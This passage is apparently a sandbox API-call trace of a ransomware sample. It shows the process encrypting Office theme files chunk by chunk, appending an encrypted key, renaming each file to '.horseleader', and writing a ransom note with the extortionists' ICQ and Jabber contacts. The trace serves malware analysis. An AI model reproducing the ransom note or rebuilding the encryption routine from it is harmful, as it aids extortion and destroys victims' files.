files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.inf.horseleader")) returned 1 [0247.121] GetProcessHeap () returned 0x780000 [0247.121] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.121] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.121] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.121] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 80 [0247.121] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.122] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.122] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.122] lstrlenW (lpString=".testttjffg") returned 11 [0247.122] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.122] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.122] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.123] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 80 [0247.123] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.123] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=5120) returned 1 [0247.123] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1400, lpOverlapped=0x0) returned 1 [0247.125] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.125] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1400, lpOverlapped=0x0) returned 1 [0247.125] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.125] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.126] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.126] CloseHandle (hObject=0x1a4) returned 1 [0247.126] GetProcessHeap () returned 0x780000 [0247.126] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.126] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.horseleader") returned 92 [0247.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.horseleader")) returned 1 [0247.127] GetProcessHeap () returned 0x780000 [0247.127] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.127] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xed34, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.128] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.128] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 81 [0247.128] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.128] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.128] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.128] lstrlenW (lpString=".testttjffg") returned 11 [0247.128] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.128] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.128] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.128] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.130] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 81 [0247.131] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.131] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=60724) returned 1 [0247.131] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.133] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.133] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.134] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.134] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.134] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.135] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4d34, lpOverlapped=0x0) returned 1 [0247.135] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb2cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.135] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4d34, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4d34, lpOverlapped=0x0) returned 1 [0247.135] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.136] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.136] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.136] CloseHandle (hObject=0x1a4) returned 1 [0247.136] GetProcessHeap () returned 0x780000 [0247.136] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.136] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.horseleader") returned 93 [0247.136] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.horseleader")) returned 1 [0247.137] GetProcessHeap () returned 0x780000 [0247.137] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.137] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xed34, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.138] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.138] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\#Decrypt#.txt") returned 82 [0247.138] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.138] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.138] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.139] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.140] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.140] CloseHandle (hObject=0x158) returned 1 [0247.140] GetProcessHeap () returned 0x780000 [0247.140] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.140] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ICE", cAlternateFileName="")) returned 1 [0247.140] lstrcmpiW (lpString1="ICE", lpString2="Windows") returned -1 [0247.140] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE") returned 63 [0247.141] lstrcmpW (lpString1="ICE", lpString2=".") returned 1 [0247.141] lstrcmpW (lpString1="ICE", lpString2="..") returned 1 [0247.141] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.141] GetProcessHeap () returned 0x780000 [0247.141] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.141] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*") returned 65 [0247.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.142] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.142] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\.") returned 65 [0247.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.142] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.143] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.143] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\..") returned 66 [0247.143] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.143] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ee600, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35ee600, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x109d0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ICE.ELM", cAlternateFileName="")) returned 1 [0247.143] lstrcmpiW (lpString1="ICE.ELM", lpString2="Windows") returned -1 [0247.143] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM") returned 71 [0247.143] StrStrIW (lpFirst="ICE.ELM", lpSrch=".horseleader") returned 0x0 [0247.143] lstrcmpW (lpString1="ICE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.143] lstrcmpW (lpString1="ICE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.143] lstrlenW (lpString=".testttjffg") returned 11 [0247.143] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.143] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.144] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.145] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM") returned 71 [0247.145] StrStrW (lpFirst="ICE.ELM", lpSrch=".txt") returned 0x0 [0247.145] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=68048) returned 1 [0247.145] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.145] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.148] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.148] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.149] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5ce8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.149] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.149] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.149] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.149] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb9d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.149] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.150] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.150] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.150] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.150] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.151] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.151] CloseHandle (hObject=0x1a4) returned 1 [0247.151] GetProcessHeap () returned 0x780000 [0247.151] 